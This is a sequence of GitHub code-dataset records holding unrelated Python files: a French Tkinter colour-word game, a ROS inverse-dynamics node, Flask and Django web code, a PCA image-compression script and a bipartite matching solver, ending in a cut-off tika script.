ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef orange():\n #niveau 1: ajoute un point au score si le mot était orange et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==4 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef yellow():\n #niveau 1: ajoute un point au score si le mot était jaune et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==5 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\ndef white():\n #niveau 1: ajoute un point au score si le mot était blanc et lance la fonction du changement de mot\n global compteur, ScoreLabel2, Rand, a\n if Rand==6 and compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n changement_mot()\n\n##Partie faite par Mattéo\n\ndef changement_mot():\n #efface le mot du niveau 1 et en remet un nouveau de texte et couleur au hasard\n global Mot, Rand, Rand2, a\n if compteur_rebours!=\"STOP\" and a==1:\n Mot.destroy()\n Rand=rd.randint(0,6)\n Rand2=rd.randint(0,6)\n Mot= tk.Label(racine, text=listNo[Rand2],foreground=listCo[Rand],font=(\"Arial\",30))\n Mot.place(x=250,y=150)\n\n##Partie faite par Antoine et Cyrian\n\ndef meilleurs():\n #affiche les 10 meilleurs scores du niveau 1\n fic = open (\"scores.txt\", \"r\")\n ligne = fic.readline()\n list=ligne.split()\n for i in range (0,len(list)):\n list[i]=int(list[i])\n list.sort()\n print(list[-10:])\n fic.close()\n\ndef meilleurs2():\n #affiche les 10 meilleurs scores du niveau 2\n fic2 = open (\"scores_niveau2.txt\", \"r\")\n ligne = fic2.readline()\n list=ligne.split()\n for i in range (0,len(list)):\n list[i]=int(list[i])\n 
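# A minimal alternative sketch (hedged aside, heapq is stdlib and not used by the original repo):\n # the full sort below is only needed to take the ten best scores; assuming the list fits in\n # memory, the same ten values come back without a full sort via\n # import heapq\n # top10 = sorted(heapq.nlargest(10, list))\n 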
list.sort()\n print(list[-10:])\n fic2.close()\n\n##Partie faite par Mattéo\n\ndef affichage_mots_multiples():\n #affiche 3 mots pour le niveau 2\n global a, list_mots, listCo, listNo, list_affich_mots\n for i in range (0, 3):\n Rand=rd.randint(0,6)\n Rand2=rd.randint(0,6)\n Mot=tk.Label(racine, text=listNo[Rand2],foreground=listCo[Rand],font=(\"Arial\",20))\n Mot.place(x=(100+i*150),y=150)\n list_affich_mots.append(Mot)\n list_mots.append(listCo[Rand])\n a=1\n\n##Partie faite par Sofiya\n\ndef affichage_boutons2():\n #affiche les boutons de couleur pour le niveau 2\n Boutonred=tk.Button(racine, text=listCo[0],background=\"red\",command=red2) #Boutons usuels\n Boutonred.place(x=118,y=280)\n Boutonblue=tk.Button(racine, text=listCo[1],background=\"blue\",command=blue2) #Boutons usuels\n Boutonblue.place(x=158,y=280)\n Boutongreen=tk.Button(racine, text=listCo[2],background=\"green\",command=green2) #Boutons usuels\n Boutongreen.place(x=203,y=280)\n Boutonpink=tk.Button(racine, text=listCo[3],background=\"pink\",command=pink2) #Boutons usuels\n Boutonpink.place(x=256,y=280)\n Boutonorange=tk.Button(racine, text=listCo[4],background=\"orange\",command=orange2) #Boutons usuels\n Boutonorange.place(x=299,y=280)\n Boutonyellow=tk.Button(racine, text=listCo[5],background=\"yellow\",command=yellow2) #Boutons usuels\n Boutonyellow.place(x=363,y=280)\n Boutonwhite=tk.Button(racine, text=listCo[6],background=\"white\",command=white2) #Boutons usuels\n Boutonwhite.place(x=425,y=280)\n\n\n##Partie faite par Cyrian et Antoine\n\ndef red2():\n #niveau 2: ajoute rouge à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"red\")\n score2()\ndef blue2():\n #niveau 2: ajoute blue à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"blue\")\n score2()\ndef green2():\n #niveau 2: ajoute green à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"green\")\n score2()\ndef pink2():\n #niveau 2: ajoute pink à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"pink\")\n score2()\ndef orange2():\n #niveau 2: ajoute orange à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"orange\")\n score2()\ndef yellow2():\n #niveau 2: ajoute yellow à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"yellow\")\n score2()\ndef white2():\n #niveau 2: ajoute white à la liste list_couleur et lance la fonction score2\n global compteur_rebours, a, list_couleurs\n if compteur_rebours!=0 and compteur_rebours!=\"STOP\" and a==1:\n list_couleurs.append(\"white\")\n score2()\n\n\ndef score2():\n #niveau 2: ajoute un poin au score si les couleurs des 3 mots ont été correctement choisies puis efface ces 3 mots et envoie vers affichage_mots_multiples pour en afficher 3 nouveaux\n global list_mots, list_couleurs, nb_clics, compteur, ScoreLabel2, 
list_affich_mots\n nb_clics+=1\n if nb_clics == 3:\n if list_mots == list_couleurs:\n compteur+=1\n ScoreLabel2.destroy()\n ScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\n ScoreLabel2.place(x=300,y=80)\n for i in range (0,3):\n list_affich_mots[i].destroy()\n list_affich_mots = []\n nb_clics=0\n list_couleurs = []\n list_mots = []\n affichage_mots_multiples()\n\n\n#programme principal fait par Antoine et Sofiya\n\nscore=0\nnb_clics=0\na=0\ncompteur=0\ncompteur_rebours=20\nlist_couleurs=[]\nlist_scores=[]\nlist_scores2=[]\nlist_affich_mots=[]\nlistCo=[\"red\",\"blue\",\"green\",\"pink\",\"orange\",\"yellow\",\"white\"]\nlistNo=['RED','BLUE','GREEN','PINK','ORANGE','YELLOW','WHITE']\nRand=rd.randint(0,6)\nRand2=rd.randint(0,6)\nlist_mots=[]\n\nracine=tk.Tk()\ncanvas = tk.Canvas(racine, width=600, height=400) #creation de la fenetre\n\nScoreLabel= tk.Label(racine, text=\"Score:\",font=(\"papyrus\",11)).place(x=260,y=80)\nScoreLabel2= tk.Label(racine, text=compteur,font=(\"papyrus\",11))\nScoreLabel2.place(x=300,y=80)\n\ntimerLabel= tk.Label(racine, text=\"Temps restant:\",font=(\"papyrus\",11)).place(x=260,y=110)\ntimerLabel2= tk.Label(racine, text=compteur_rebours,font=(\"papyrus\",11))\ntimerLabel2.place(x=360, y=110)\n\ntext= tk.Label(racine, text=\"Cliquez sur le bouton correspondant à la couleur des mots, et pas au texte des mots!!!\", font=(\"papyrus\",11)).place(x=25,y=45)\n\nBoutonrereinitialiser=tk.Button(racine, text=\"Reinitialiser Niveau1\",background=\"light grey\",command=reinitialiser) #Boutons usuels\nBoutonrereinitialiser.place(x=425,y=350)\nBoutonrereinitialiser=tk.Button(racine, text=\"Reinitialiser Niveau2\",background=\"light grey\", command=reinitialiser2) #Boutons usuels\nBoutonrereinitialiser.place(x=425,y=320)\n\nBoutongo=tk.Button(racine, text=\"GO-niveau1\",background=\"light grey\",command=start)\nBoutongo.place(x=25,y=350)\nBoutongo2=tk.Button(racine, text=\"GO-niveau2\",background=\"light grey\", command=start_niveau2)\nBoutongo2.place(x=25,y=320)\n\nBouton_meilleurscore=tk.Button(racine, text=\"10 best Niveau1\",background=\"light grey\",command=meilleurs) #Boutons usuels\nBouton_meilleurscore.place(x=140,y=350)\nBouton_meilleurscore=tk.Button(racine, text=\"10 best Niveau2\",background=\"light grey\",command=meilleurs2) #Boutons usuels\nBouton_meilleurscore.place(x=280,y=350)\n\nrectangle1=canvas.create_rectangle(0,0,20,400,fill=\"green\", outline=\"green\")\nrectangle2=canvas.create_rectangle(0,0,600,20,fill=\"green\", outline=\"green\")\nrectangle3=canvas.create_rectangle(580,0,600,400,fill=\"green\", outline=\"green\")\nrectangle4=canvas.create_rectangle(0,380,600,400,fill=\"green\", outline=\"green\")\n\ncanvas.grid()\n\n\n#fin programme\ncanvas.mainloop()\n\n\n\n\n","repo_name":"Caruuuuuu/IN200-Projet2","sub_path":"couleur_AECK.py","file_name":"couleur_AECK.py","file_ext":"py","file_size_in_byte":14596,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10929484389","text":"#!/usr/bin/env python\n\nimport rospy\nfrom Common.Ros_msg_types.data_transformation.msg import Spatial_force, Joints_spatial_force\nfrom Common.Ros_msg_types.vicon_data_publisher.msg import Force_plate_data\nfrom Common.Ros_msg_types.ur_robot_data_acquisition.msg import Joint_parameters\nimport statistics\nfrom rospy import Time\nfrom dataclasses import dataclass\nfrom typing import TypeVar, Generic\nfrom Common.Inverse_dynamics_bottom_up import Inverse_dynamics_force_plate_ur5e, ThreeTuple, 
SixTupleTuple\nfrom Common.Inverse_dynamics_top_down import Inverse_dynamics_top_down\nfrom typing import Union\n\nT = TypeVar('T')\n\n\n@dataclass\nclass Timed_T(Generic[T]):\n time: Time\n value: T\n\n\nTimed_q = Timed_T[\"list[float]\"]\n\n\nclass Inverse_dynamics_node:\n top_down: Inverse_dynamics_top_down = Inverse_dynamics_top_down()\n bottom_up: Inverse_dynamics_force_plate_ur5e = Inverse_dynamics_force_plate_ur5e()\n\n def __init__(self):\n self.fpd_times: \"list[Time]\" = list()\n self.fpds: \"list[Force_plate_data]\" = list()\n self.previous_q: Timed_q = None\n self.previous_q_dot: Timed_q = None\n\n #############################################\n\n # Higher frequency\n\n def force_plate_data(self, fpd: Force_plate_data, time: rospy.Time):\n self.fpd_times.append(time)\n self.fpds.append(fpd)\n return\n\n #############################################\n\n # Lower frequency\n\n def joint_parameters(self, jp: Joint_parameters, time: rospy.Time) -> Union[Joints_spatial_force, None]:\n # Calculate q, q_dot, q_ddot\n qs = self.__calculate_qs(time=time, jp=jp)\n if qs == None:\n return None\n q, q_dot, q_ddot = qs\n\n # Calculate mean of Force_plate_data\n mean_fpd: Force_plate_data = self.__calculate_mean_fpd()\n if mean_fpd == None:\n return None\n f_force_plate: ThreeTuple = (mean_fpd.fx_N, mean_fpd.fy_N, mean_fpd.fz_N)\n m_force_plate: ThreeTuple = (mean_fpd.mx_Nm, mean_fpd.my_Nm, mean_fpd.mz_Nm)\n\n # Calculate torques\n # bottom_up_torques: SixTuple = bottom_up.calculate_torques(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value, f_force_plate=f_force_plate, m_force_plate=m_force_plate)\n # top_down_torques: SixTuple = top_down.calculate_torques(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value)\n\n # Validate bottom_up calculation part without force_plate.\n # Expect to see identical torques. 
Succeeded 11.08.2023.\n # top_down_torques: SixTuple = top_down.calculate_torques(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value)\n # base_force: SixTuple = top_down.calculate_forces(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value)[0]\n # bottom_up_torques: SixTuple = bottom_up.calculate_torques_from_base_force(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value, base_force=base_force)\n\n # Calculate forces\n bottom_up_forces: SixTupleTuple = Inverse_dynamics_node.bottom_up.calculate_spatial_forces(\n q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value, f_force_plate=f_force_plate, m_force_plate=m_force_plate)\n top_down_forces: SixTupleTuple = Inverse_dynamics_node.top_down.calculate_spatial_forces(q=q.value, q_dot=q_dot.value, q_ddot=q_ddot.value)\n\n joints_bottom_up = [Spatial_force(m_xyz__f_xyz=force) for force in bottom_up_forces]\n joints_top_down = [Spatial_force(m_xyz__f_xyz=force) for force in top_down_forces]\n\n joints_spatial_force: Joints_spatial_force = Joints_spatial_force(joints_bottom_up=joints_bottom_up, joints_top_down=joints_top_down)\n\n self.fpd_times.clear()\n self.fpds.clear()\n return joints_spatial_force\n\n #############################################\n\n def __calculate_mean_fpd(self) -> \"Union[Force_plate_data, None]\":\n # Ohne Mitteln von Force_plate_data, mit (linearer) Interpolation von Joint_parameters, ginge es auch.\n if len(self.fpds) == 0:\n return None\n mean_fpd: Force_plate_data = Force_plate_data()\n for fieldName in Force_plate_data.__slots__:\n field_values_list: list[float] = [getattr(forcePlateData, fieldName) for forcePlateData in self.fpds]\n field_mean: float = statistics.fmean(field_values_list)\n setattr(mean_fpd, fieldName, field_mean)\n\n return mean_fpd\n\n def __calculate_qs(self, time: Time, jp: Joint_parameters) -> \"Union[tuple[Timed_q, Timed_q, Timed_q], None]\":\n q: Timed_q = Timed_q(time, jp.actual_joint_positions)\n\n if self.previous_q == None:\n self.previous_q = q\n return None\n\n # Jitter in actual_joint_positions will lead to wrong huge velocities.\n # Ideas to fix this: 1euroFilter on actual_joint_positions OR ignore huge velocities.\n # Current workaround: use actual_joint_velocities from the robot instead.\n # q_dot: Timed_q = backward_derivative_secs(q2=q, q1=previous_q)\n q_dot: Timed_q = Timed_q(time, jp.actual_joint_velocities)\n self.previous_q = q\n\n if self.previous_q_dot == None:\n self.previous_q_dot = q_dot\n return None\n\n q_ddot: Timed_q = Inverse_dynamics_node.__backward_derivative_secs(q2=q_dot, q1=self.previous_q_dot)\n self.previous_q_dot = q_dot\n\n return (q, q_dot, q_ddot)\n\n @staticmethod\n def __backward_derivative_secs(q2: Timed_q, q1: Timed_q) -> Timed_q:\n dt_s: float = (q2.time - q1.time).to_sec()\n dq_rad: list[float] = [q2.value[i] - q1.value[i] for i in range(6)]\n q_dot: list[float] = [dq_rad[i] / dt_s for i in range(6)]\n return Timed_q(time=q2.time, value=q_dot)\n","repo_name":"MobMonRob/InverseDynamicsWithForcePlate","sub_path":"Scripts/Common/Inverse_dynamics_node.py","file_name":"Inverse_dynamics_node.py","file_ext":"py","file_size_in_byte":5663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11356010794","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\nfrom flask import Flask, request, render_template, send_file, jsonify\nfrom six import BytesIO\n\nfrom canif.decorators import jsonp\nfrom canif.exporter import export_insee_data\n\nimport 
logging\nlogging.basicConfig()\n\nlogging.getLogger('elasticsearch').setLevel(logging.DEBUG)\nlogging.getLogger('urllib3').setLevel(logging.DEBUG)\n\napp = Flask(__name__)\n\n# from canif.redis import RedisBackend\n# backend = RedisBackend()\n\nfrom canif.elasticsearch import ElasticsearchBackend\nbackend = ElasticsearchBackend()\n\n\n@app.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\n@app.route('/', methods=['POST'])\ndef upload_form():\n communes = [c for c in request.form['cities_val'].split(\",\") if c]\n variables = [v for v in request.form['variables_val'].split(\",\") if v]\n filename = \"communes-%s-variables-%s.csv\" % (\n ','.join(communes), ','.join(variables)\n )\n mimetype = \"text/csv\"\n output = export_insee_data(backend, communes, variables)\n return send_file(BytesIO(output.read().encode('utf-8')),\n attachment_filename=filename,\n as_attachment=True, mimetype=mimetype)\n\n\n@app.route('/search_variables', methods=['GET'])\n@jsonp\ndef search_variables():\n return jsonify(\n variables=backend.search_variables(request.args.get('query', \"\"))\n )\n\n\n@app.route('/search_variables/<var_ids>', methods=['GET'])\n@jsonp\ndef get_variables(var_ids):\n var_ids = var_ids.split(',')\n return jsonify(\n variables=backend.get_variables(var_ids)\n )\n\n\n@app.route('/search_communes', methods=['GET'])\n@jsonp\ndef search_communes():\n return jsonify(\n communes=backend.search_communes(request.args.get('query', \"\"))\n )\n\n\n@app.route('/search_communes/<codgeos>', methods=['GET'])\n@jsonp\ndef get_communes(codgeos):\n codgeos = codgeos.split(',')\n return jsonify(\n communes=backend.get_communes(codgeos)\n )\n\n\ndef serve():\n app.run(debug=True)\n","repo_name":"Natim/canif","sub_path":"canif/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21704836308","text":"from .models import Student, StudentClass, Exam, Score, Subject, Feedback\nfrom django import forms\nfrom django.contrib.auth.models import User\n# from django.core.validators import ValidationError\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, MultiWidgetField, Submit\n\n\nclass StudentForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n super(StudentForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-horizontal'\n self.helper.form_method = 'post'\n self.helper.add_input(Submit('submit', 'Save'))\n\n self.helper.layout = Layout(\n 'admin_no',\n 'first_name',\n 'middle_name',\n 'surname',\n 'gender',\n MultiWidgetField(\n 'dob',\n attrs=(\n {'style': 'width: 30%; display: inline-block;'}\n )\n ),\n 'sclass',\n 'image'\n\n )\n\n class Meta:\n model = Student\n fields = ['admin_no', 'first_name', 'middle_name', 'surname',\n 'gender', 'dob', 'sclass', 'image']\n\n widgets = {\n 'dob': forms.SelectDateWidget(years=[str(val) for val in range(1998, 2005)]),\n }\n\n help_texts = {\n 'dob': 'Enter the day you saw the world'\n }\n\n labels = {\n 'dob': 'Date of Birth',\n 'sclass': 'Class',\n 'admin_no': 'Admission Number'\n }\n\n\nclass StudentClassForm(forms.ModelForm):\n class Meta:\n model = StudentClass\n fields = ['standard', 'year', 'teacher']\n\n\nclass ExamForm(forms.ModelForm):\n class Meta:\n model = Exam\n fields = ['term', 'etype']\n\n labels = {\n 'etype': 'Type'\n }\n\n\nclass ScoreForm(forms.ModelForm):\n class Meta:\n model = Score\n fields = ['student', 
'subject', 'exam', 'marks']\n\n # labels = {\n # 'sclass': 'Class'\n # }\n\n\nclass UserForm(forms.ModelForm):\n password = forms.CharField(widget=forms.PasswordInput)\n\n class Meta:\n model = User\n fields = ['username', 'email', 'password']\n\n help_texts = {\n 'username': ' '\n }\n\n\nclass StudentSearchForm(forms.Form):\n\n form = forms.ModelChoiceField(\n queryset=StudentClass.objects.all(),\n required=False,\n empty_label='Select Class',\n )\n name = forms.CharField(\n max_length=100,\n required=False,\n help_text='Search by first name, second name or last name'\n )\n\n def __init__(self, *args, **kwargs):\n super(StudentSearchForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-inline'\n self.helper.field_template = 'bootstrap3/layout/inline_field.html'\n self.helper.layout = Layout(\n 'name',\n 'form',\n Submit('Search', 'search', css_class='btn-default'),\n )\n self.helper.form_method = 'get'\n\n def get_queryset_filters(self):\n filters = {}\n if self.is_valid():\n name = self.cleaned_data.get('name')\n filters['name'] = name\n\n\nclass ScoreSearchForm(forms.Form):\n\n name = forms.CharField(\n max_length=100,\n required=False,\n help_text='Search by first name, middle_name or last name'\n )\n form = forms.ModelChoiceField(\n queryset=StudentClass.objects.all(),\n required=False,\n empty_label='Select Class',\n )\n subject = forms.ModelChoiceField(\n queryset=Subject.objects.all(),\n required=False,\n empty_label='Select Subject',\n )\n\n def __init__(self, *args, **kwargs):\n super(ScoreSearchForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_class = 'form-inline'\n self.helper.field_template = 'bootstrap3/layout/inline_field.html'\n self.helper.layout = Layout(\n 'name',\n 'form',\n 'subject',\n Submit('Search', 'search', css_class='btn-default'),\n )\n self.helper.form_method = 'get'\n\n def get_queryset_filters(self):\n filters = {}\n if self.is_valid():\n name = self.cleaned_data.get('name')\n filters['name'] = name\n\n\nclass FeedbackForm(forms.ModelForm):\n class Meta:\n model = Feedback\n fields = ['name', 'email', 'subject', 'message']\n","repo_name":"ErickMwazonga/The-Wema-Academy","sub_path":"thewema/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"29067473817","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 23 18:02:59 2016\n\n@author: saber\n\"\"\"\nimport sys\n\nreload(sys) \nsys.setdefaultencoding('utf8')\n\ndef getPARAGRAPH(transcription,dict_total,seuil):\n\n # parcourirs all line\n all_txt = transcription.split('\\n') \n i=0\n tab_sent = []\n dict_sent ={}\n while (i < len(all_txt)): \n \n if len(all_txt[i])!=0: \n dict_sent[i]=all_txt[i]\n if i+1 < len(all_txt): \n taille_line_1 = len(all_txt[i].split(' ')) \n key = all_txt[i].split(' ')[taille_line_1-1]+'\\t'+all_txt[i+1].split(' ')[0]\n if dict_total.has_key(key):\n if dict_total[key]>seuil: \n tab_sent.append(str(i)+'-'+str(i+1)+'-O') \n else: \n tab_sent.append(str(i)+'-'+str(i+1)+'-N')\n else: \n tab_sent.append(str(i)+'-'+str(i+1)+'-N')\n #\n i=i+1\n else:\n i=i+1\n # restructuration de la transcription\n i=0\n is_group = False \n tab_group=[] \n new_sent = '' \n #print(dict_sent)\n #print(tab_sent)\n while(i\", methods=[\"POST\"])\ndef update_washer(id):\n try:\n body = request.get_json()\n washer = Washer.query.get(id)\n washer.name = body['title']\n washer_data = 
body_to_washer_data_entity(body)\n db.session.add(washer_data)\n db.session.commit()\n return washer.serialize\n except Exception as ex:\n return Response(\n str(ex),\n status=400,\n )\n\n\n@washer_bp.route(\"/getWasher/<id>\", methods=[\"GET\"])\ndef get_service(id):\n try:\n washer = Washer.query.get(id)\n return washer.serialize\n except Exception as ex:\n return Response(\n str(ex),\n status=400,\n )\n\n\n@washer_bp.route(\"/deleteWasher/<id>\", methods=[\"POST\"])\ndef delete_service(id):\n try:\n washer = Washer.query.get(id)\n if (checkOrdersActive(washer.order)):\n washer.isDeleted = True\n db.session.commit()\n return washer.serialize\n raise Exception(\"Order is Active\")\n except Exception as ex:\n return Response(\n str(ex),\n status=400,\n )\n\n\n@washer_bp.route(\"/<washCompany_id>/getWashers\", methods=[\"GET\"])\ndef get_services(washCompany_id):\n args = request.args\n page = args.get('page')\n try:\n washers = Washer.query.filter(Washer.washCompany_id == washCompany_id, Washer.isDeleted == False).order_by(\n Washer.name.asc()).paginate(page=int(page), per_page=10, error_out=False)\n return [i.serialize for i in washers]\n except Exception as ex:\n return Response(\n str(ex),\n status=400,\n )\n\n@washer_bp.route(\"/getWasherOrders/<id>\", methods=[\"GET\"])\ndef get_washer_orders(id):\n orders = Washer.query.get(id).order\n return [order.serialize_washer_orders for order in orders]\n","repo_name":"usachirchikskiy/silly_wash","sub_path":"project/route/WasherRoute.py","file_name":"WasherRoute.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11761070990","text":"pens = int(input())\r\nmarkers = int(input())\r\nliquid = float(input())\r\npercent = int(input())\r\ntotal_pens = pens * 5.80\r\ntotal_markers = markers * 7.20\r\ntotal_liquid = liquid * 1.20\r\nsum = total_pens+total_markers+total_liquid\r\ntotal_sum = sum - (sum*percent/100)\r\nprint(total_sum)\r\n","repo_name":"Mitoff/SoftUni-problems","sub_path":"first_steps_in_coding_exercises/supplies_for_school.py","file_name":"supplies_for_school.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"28738874182","text":"from django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom .models import Posts\n\n\nclass BlogTest(TestCase):\n @classmethod\n def setUpTestData(cls):\n testuser1 = User.objects.create_user(username='testuser1', password='testpassword')\n testuser1.save()\n\n testpost = Posts.objects.create(\n author=testuser1, title='test post 1',\n body='test body 1'\n )\n testpost.save()\n\n def test_blog_content(self):\n post = Posts.objects.get(id=1)\n author = f'{post.author}'\n title = f'{post.title}'\n body = f'{post.body}'\n\n self.assertEqual(author, 'testuser1')\n self.assertEqual(title, 'test post 1')\n self.assertEqual(body, 'test body 1')\n","repo_name":"Abdulrehman517/Blog_Api_Project","sub_path":"posts/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"4039668211","text":"# %%\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import normalize\nimport scipy.io as sio\nimport matplotlib.image as image\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\n# %%\nimage = plt.imread(\"cat.jpeg\")\n\n# %%\nimage_np = 
np.array(image)\nimage_r = image_np[:,:,0]\nimage_g = image_np[:,:,1]\nimage_b = image_np[:,:,2]\n# %%\ndef comp_2d(image_2d): # FUNCTION FOR RECONSTRUCTING 2D MATRIX USING PCA\n\tcov_mat = image_2d - np.mean(image_2d , axis = None)\n\teig_val, eig_vec = np.linalg.eigh(np.cov(cov_mat)) # USING \"eigh\", SO THAT PROPRTIES OF HERMITIAN MATRIX CAN BE USED\n\tp = np.size(eig_vec, axis =None)\n\tidx = np.argsort(eig_val)\n\tidx = idx[::-1]\n\teig_vec = eig_vec[:,idx]\n\teig_val = eig_val[idx]\n\tnumpc = 1 # THIS IS NUMBER OF PRINCIPAL COMPONENTS, YOU CAN CHANGE IT AND SEE RESULTS\n\tif numpc
< p or numpc >
0:\n\t\teig_vec = eig_vec[:, range(numpc)]\n\tscore = np.dot(eig_vec.T, cov_mat)\n\trecon = np.dot(eig_vec, score) + np.mean(image_2d, axis = None).T # SOME NORMALIZATION CAN BE USED TO MAKE IMAGE QUALITY BETTER\n\trecon_img_mat = np.uint8(np.absolute(recon)) # TO CONTROL COMPLEX EIGENVALUES\n\treturn recon_img_mat\n\nimage_r_recon, image_g_recon, image_b_recon = comp_2d(image_r), comp_2d(image_g), comp_2d(image_b) # RECONSTRUCTING R,G,B COMPONENTS SEPARATELY\nrecon_color_img = np.dstack((image_r_recon, image_g_recon, image_b_recon)) # COMBINING R.G,B COMPONENTS TO PRODUCE COLOR IMAGE\nrecon_color_img = Image.fromarray(recon_color_img)\nrecon_color_img.show()\n\n# %%\n","repo_name":"VinhDevNguyen/Image-Compression","sub_path":"PCA_Image_Compress.py","file_name":"PCA_Image_Compress.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71588750849","text":"import tkinter as tk\r\nimport tkinter.font as tkFont\r\n\r\napp = tk.Tk()\r\n\r\napp.winfo_toplevel().title(\"Python Project 5.8\")\r\n\r\napp.geometry(\"640x480\")\r\n\r\nfontStyle = tkFont.Font(family=\"Affirmative\", size=16)\r\n\r\nprojectLabel = tk.Label(app, text=\"The system is idle\", font=fontStyle)\r\n\r\ndef systemOn():\r\n projectLabel.config(text = \"System Running\")\r\n\r\ndef systemOff():\r\n projectLabel.config(text=\"System Off\")\r\n\r\npixelVirtual = tk.PhotoImage(width=1, height=1)\r\n\r\nprojectLabel.pack(side=tk.TOP)\r\n\r\nbuttonOn = tk.Button(app, text=\"System On\", image=pixelVirtual, width=200, height=100, compound=\"c\", command=systemOn)\r\nbuttonOn.place(x=100, y=400)\r\n\r\nbuttonOff = tk.Button(app, text=\"System Off\", image=pixelVirtual, width=200, height=100, compound=\"c\", command=systemOff)\r\nbuttonOff.place(x=340, y=400)\r\n\r\nbuttonExit = tk.Button(app, text=\"EXIT\", command=app.quit)\r\nbuttonExit.pack(side=tk.BOTTOM)\r\n\r\napp.mainloop()","repo_name":"Morty-Lovin/Portfolio","sub_path":"JMortonPYProject5_8/JMortonPYProject5_8.py","file_name":"JMortonPYProject5_8.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13730116108","text":"#!/bin/python\nimport sys\nfrom algos import *\n\n# Solves the weighted bipartite matching problem\n# The input format is as follows:\n# first line: two numbers representing the number of elements in each partition\n# every other line: a pair of numbers i,j from 1 to n/m representing a connection\n# between node i of the first partition and node j of the second\n# partition\n# followed by another integer representing the weight of that edge\n# Example:\n\n#5 5\n#1 5 10\n#2 1 18\n#2 2 14\n#2 5 9\n#3 5 2\n#4 3 16\n#4 5 10\n#5 2 19\n#5 4 9\n\n\ndef read_graph():\n m, n = map(int, sys.stdin.readline().split())\n g = WeightedAssignmentProblem(max(m, n))\n\n d = sys.stdin.readlines()\n for line in d:\n nodes = line.split()\n g.set_edge(int(nodes[0]) - 1, int(nodes[1]) - 1, int(nodes[2]))\n\n return g\n\n\ng = read_graph()\nshow_pairing(g, munkres_algorithm(g))\n","repo_name":"RicardoBrancas/Advanced-Algorithms","sub_path":"weighted_bipartite_match.py","file_name":"weighted_bipartite_match.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"19441677348","text":"from tika import parser\nimport os\nimport shutil\nimport glob\nimport datetime\n\ndef run(directory):\n # 
